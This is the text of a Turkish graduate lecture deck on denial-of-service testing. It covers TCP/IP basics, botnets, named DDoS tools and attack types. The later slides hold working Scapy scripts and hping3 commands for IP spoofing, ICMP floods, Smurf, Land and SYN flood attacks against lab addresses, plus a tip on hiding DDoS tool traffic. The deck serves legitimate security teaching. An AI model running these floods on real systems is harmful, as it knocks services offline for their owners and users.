Post on 12-Apr-2017
Temel Bilgiler BotNetsDDoS Saldırıları
Servis Dısı Bırakma TestleriBGM 554 - Sızma Testleri ve Guvenlik Denetlemeleri-II
Bilgi Guvenligi MuhendisligiYuksek Lisans Programı
Dr. Ferhat Ozgur Catakozgur.catak@tubitak.gov.tr
Istanbul Sehir Universitesi2016 - Bahar
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Icindekiler
1 Temel BilgilerTCP/IP StandardıDos/DDoS SaldırılarıDigital Attack Map
2 BotNetsBotnetRoBotNetwork
Botnet PropagationBotnet AraclarıDos/DDoS Aracları
3 DDoS SaldırılarıGirisYontemlerSaldırılar
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
TCP/IP StandardıDos/DDoS Saldırıları
Digital Attack Map
Icindekiler
1 Temel BilgilerTCP/IP StandardıDos/DDoS SaldırılarıDigital Attack Map
2 BotNetsBotnetRoBotNetwork
Botnet PropagationBotnet AraclarıDos/DDoS Aracları
3 DDoS SaldırılarıGirisYontemlerSaldırılar
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
TCP/IP StandardıDos/DDoS Saldırıları
Digital Attack Map
TCP/IP Standardı
Tanım
I Internet’in temeli
I Yollanan veriler her katmandasarmallanır (encapsulation) ve biralt katmana yollanır.
I Alıcı tarafında bu veriler teker tekeracılıp (decapsulation) bir ustkatmana gonderilir
I Uygulama
I Tasıma
I Ag
I AgErisimi
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
TCP/IP StandardıDos/DDoS Saldırıları
Digital Attack Map
Dos/DDoS Saldırıları
Kavramlar
I DoS
I DDoS
I RoBotNetwork
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
TCP/IP StandardıDos/DDoS Saldırıları
Digital Attack Map
DoS Saldırıları
Hedef
I Sunucu/Bilgisayar
I Ag bilesenleri
I Uygulamalar
I Web siteleri
Yaklasım
I Band genisligiI kurallara uygun olmayan, yuksek trafik istegiI hedef: ag band genisligi, baglantı
I BaglantıI Sunucu yuksek baglantı istegi ile calısamaz hale getirilir.I CPU/Memory kaynakları tukenirI Yasal kullanıcılar icin cevap veremez hale gelir.
I Sonuc: Isletmenin hizmet verememesi.
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
TCP/IP StandardıDos/DDoS Saldırıları
Digital Attack Map
DDoS Saldırıları
DDoS
I Kurbana yapılan saldırının tek kaynaktan yapılmaması.
I Koordineli sekilde yuksek boyutlu saldırı
I Cesitli ajan yazılımlar kullanılarak yapılmaktadır.
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
TCP/IP StandardıDos/DDoS Saldırıları
Digital Attack Map
DoS Saldırı Etkileri
DoS Saldırı Etkileri
I IT birimine olan etkileriI dusuk ag genisligiI Istek icin baglantıda yavaslıkI Isteklere cevap verememe
I Isletmeye etkileriI Prestij kaybıI Musteri kaybıI Calısmayan servisler
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
TCP/IP StandardıDos/DDoS Saldırıları
Digital Attack Map
Digital Attack Map - http://www.digitalattackmap.com I
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
TCP/IP StandardıDos/DDoS Saldırıları
Digital Attack Map
Digital Attack Map - http://www.digitalattackmap.com II
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
TCP/IP StandardıDos/DDoS Saldırıları
Digital Attack Map
Digital Attack Map - http://www.digitalattackmap.com III
Digital Attack Map
I Canlı DDoS saldırıları
I Gecmis tarih gosterimi
I Basında yer alan haberlerI Google Jigsaw (Eski adı: Google Ideas)
I Project Shield (anti-DDoS Service)I media, elections, and human rights related content.I Cloudflare alternatif
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
Icindekiler
1 Temel BilgilerTCP/IP StandardıDos/DDoS SaldırılarıDigital Attack Map
2 BotNetsBotnetRoBotNetwork
Botnet PropagationBotnet AraclarıDos/DDoS Aracları
3 DDoS SaldırılarıGirisYontemlerSaldırılar
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
Botnet
Botnet
I Bot: Saldırgan tarafından zararlı amaclar icin bilgisayarlarınkontrolunu alan yazılımlar.
I Zombie, zombie agentI Cluster: Ele gecirilmis (compromised computers)
bilgisyarlardan olusan, bir kurbana saldıran bilgisayar kumesiI Bu bilgisayarlar sahiplerinin haberi olmadan ele gecirilmislerdir.I Baska birinin bilgisayarını kullnarak saldırgan yasal olmayan
aktivitelerini gizler.
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
RoBotNetwork I
Tanım
Cesitli gorevleri yerinegetirmek icin ”botnetowner” tarafındankullanılan ineternete baglıolan cihazlardan olusan ag.
I DDoS
I Veri Hırsızlıgı
I Spam
I Bir cihaza erisim
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
RoBotNetwork II
Mimari
Sekil: Client-Server Model
I Rustock botnet
I Srizbi botnet
Sekil: P2P Model
I Gameover ZeuS
I ZeroAccess botnet
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
RoBotNetwork III
Botnet Bilesenleri
I Command and control (C&C):I Botnet uyelerine komutları gonderen bilgisayarlar.
I Zombie computer :I Zararlı gorevleri yerine getirmek icin saldırgan, virus gibi
bilesenler tarafından ele gecirilen bilgisayarlar.
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
RoBotNetwork IV
Carna Botnet
I ”Default password”, ”no password” router kullanıldı.
I 24 saatlik internet kullanımını gostermek icin
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
Botnet Propagation
I Yayılım dolaylı olur.
I Saldırgan yonetici olarakcalısır, saldırıya katılmaz
I Saldırgan “campaignmanagers” uzerinden gider
I Saldırgan, saldırı agıolusturur ”affiliationnetwork of attackers”
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
Botnet Aracları
Botnet Aracları
I Win32.Shark: backdoor Trojan horseOzellikleri
I reverse connecting
I firewall-bypassing
I remote admnistration
Yayılma Yontemleri
I Spam e-postalar
I illegal siteler
I Poison Ivy: Remote Access Trojan (RAT)
I sifreler
I banka bilgileri
I Netbot Attacker
I PlugBot
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
Dos/DDoS Aracları I
I Tribal Flood Network (TFN):I Unix-based, ICMP, Smurf, UDP, SYN flood saldırıları
I Trinoo:I UDP flood
I Stacheldraht:I UDP, ICMP, TCP SYN, Smurf attack
I TFN2K:
I WinTrinoo:
I ShaftI MStream
I Agent binaries contain a list of master machines that aredefined at compile-time by the attacker.
I Trinity
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
Dos/DDoS Aracları II
Table: DDoS Aracları
DDoS Tool Saldırı Yontemi
Trinoo UDPTFN UDP, ICMP, TCPStacheldraht UDP, ICMP, TCPTFN2K UDP, ICMP, TCPShaft UDP, ICMP, TCPMStream TCPTrinity UDP, TCP
Ipucu
Kullanılan DDoS aracının olusturdugu trafigin yakalanmasınızorlastırmak icin yuksek port numaraları kullanmalı, iletisim sifreliolmalıdır.
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
Dos/DDoS Aracları III
DDoS Tools
I Low Orbit Ion Cannon (LOIC)
I High Orbit Ion Cannon (HOIC)
I Anonymous DoS
I Tor’s Hammer
I DDOSIM
I DAVOSET
I PyLoris
I Moihack Port-Flooder
I XOIC
I OWASP DOS HTTP Post
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
High Orbit Ion Cannon (HOIC) I
High Orbit Ion Cannon (HOIC)
I HTTP focused distruction tool.
I Yuksek hızlı multi-threaded HTTP seli
I Es zamanlı farklı sitelere HTTP seli
I Farklı HTTP baslıkları olusturarak ”traffic flow” senaryosucalıstırabilme
I Windows icin gelistirilmis
I Wine ile Linux, Mac Osx ile kullanılabilir.
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
High Orbit Ion Cannon (HOIC) II
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
High Orbit Ion Cannon (HOIC) III
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
BotnetRoBotNetworkBotnet Propagation
Botnet AraclarıDos/DDoS Aracları
High Orbit Ion Cannon (HOIC) IV
Paketler
I ”Follow stream”
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
Icindekiler
1 Temel BilgilerTCP/IP StandardıDos/DDoS SaldırılarıDigital Attack Map
2 BotNetsBotnetRoBotNetwork
Botnet PropagationBotnet AraclarıDos/DDoS Aracları
3 DDoS SaldırılarıGirisYontemlerSaldırılar
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
DDoS Saldırıları
OSI katmanları ve DDoS
I L7:I Uygulamalarda bulunan
Bellek, Disk, CPU odaklıbuglar
I Brute forceI DNS AmplificationI Fork Bomb
I L4:I SYN FloodI TeardropI ACK/FIN/RST floodI DRDOS (Reflection)
I L3:I ICMP/Ping floodI FraggleI SmurfI Ping of Death
I L2:I ARP seliI VTP saldırısı
I L1:I Fiziksel zararI Ag/Guc kablosunun
cekilmesi
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
Yontemler
Yontemler
I Miktar Artırma
I Boyut artırma
I Yansıtma
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
Paket
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
IP Sahteciligi I
IP Sahteciligi (IP Spoofing)
I istenilen sahte ip adresinden TCP/IP paketleri gonderilmesi
I TCP, UDP, IP, ICMP, HTTP, SMTP, DNS
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
IP Sahteciligi II
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
IP Sahteciligi Scapy
from scapy.all import *
A = ’192.168.0.101 ’ # spoofed source IP address
B = ’192.168.0.102 ’ # destination IP address
C = 10000 # source port
D = 20000 # destination port
payload = "yada yada yada" # packet payload
spoofed_packet=IP(src=A,dst=B)/TCP(sport=C,dport=D)/ payload
send(spoofed_packet)
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
ICMP Attacks I
ICMP Attacks
I Ping sweep:I Ag uzerinde bulunan bilgisayarların kesfi icin kullanılan en eski
yontemlerden biri.
Listing 1: fping kullanımı
$ fping -g 192.168.2.1/24
192.168.2.1 is alive
192.168.2.2 is alive
192.168.2.6 is alive
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
ICMP Attacks II
Listing 2: nmap kullanımı$ nmap -sP 192.168.2.1/24 -open
Starting Nmap 7.12 ( https :// nmap.org ) at 2017 -02 -18 21:53 MSK
Nmap scan report for 192.168.2.1
Host is up (0.0076s latency ).
Nmap scan report for 192.168.2.2
Host is up (0.0078s latency ).
Nmap scan report for 192.168.2.6
Host is up (0.00045s latency ).
Nmap scan report for 192.168.2.7
Host is up (0.038s latency ).
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.81 seconds
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
ICMP Attacks III
Listing 3: Bash for loop script versiyonu$ for i in {1..254}; do ping -c 1 192.168.2. $i |grep ’from ’;done
64 bytes from 192.168.2.1: icmp_seq =0 ttl=64 time =4.122 ms
64 bytes from 192.168.2.2: icmp_seq =0 ttl=64 time =1.544 ms
64 bytes from 192.168.2.4: icmp_seq =0 ttl=64 time =906.586 ms
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
Ping Flood (ICMP Flood) I
ICMP Seli
I Saldırgan, kurban bilgisayara cok yuksek miktarda ICMP(ping) istekleri gondererek kaynak tuketimine yol acmasınısaglar
I Saldırı 3 kategoriye ayrılabilir.I Hedefli ping seli: Lokal ag icerisinde yer alan bilgisayar.
Saldırgan fiziksel erisimi mevcutI Router hedefli ping seli: Hedef routerlar, amac ag icerisinde
yer alan bilgisayar haberlesmesinin engellenmesi.I Blind Ping Flood:
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
Ping Flood (ICMP Flood) II
Listing 4: Python ICMP seli
from scapy.all import *
ip_hdr = IP(dst="192.168.2.1")
packet = ip_hdr/ICMP ()/("m"*60000) #send 60kb of junk
send(packet)
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
Ping Flood (ICMP Flood) III
Listing 5: Hping3 ICMP seli
hping3 -1 --flood 192.168.2.7
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
ICMP Smurf I
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
ICMP Smurf II
Listing 6: Python ICMP Smurf
from scapy.all import *
victim_ip = "192.168.2.7"
ip_hdr = IP(src=victim_ip , dst="192.168.2.6")
packet = ip_hdr/ICMP ()/("m"*60000) #send 60kb of junk
send(packet)
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
ICMP Smurf III
Listing 7: Hping3 ICMP Smurf
hping3 -1 --flood -a 192.168.2.3 192.168.2.7
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
Land Attack I
Land Saldırısı
I Saldırgan spoof edilmis SYN paketleri gonderir
I Paketlerde source ve destination IP adresleri kurbanın IPadresidir.
I Kurban cevap olarak kendisine SYN-ACK paketi gonderir.
I Bu sekilde sistem kaynaklarının tuketilmesi hedeflenir
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
Land Attack II
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
Land Attack III
Listing 8: Land Attackhping3 -c 1 --baseport 80 --destport 80 -S --spoof X.X.X.X X.X.X.X
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
Land Attack IV
Listing 9: Python Land Attack>>> send(IP(src="192.168.2.7", dst="192.168.2.7")/TCP(sport =135, dport =135), count =2000)
................................................
Sent 2000 packets.
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
TCP SYN Seli I
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri
Temel Bilgiler BotNetsDDoS Saldırıları
Giris YontemlerSaldırılar
TCP SYN Seli II
Listing 10: Hping SYN Seli
$ sudo hping3 --flood -S -p 88 192.168.2.7
Dr. Ferhat Ozgur Catak ozgur.catak@tubitak.gov.tr Servis Dısı Bırakma Testleri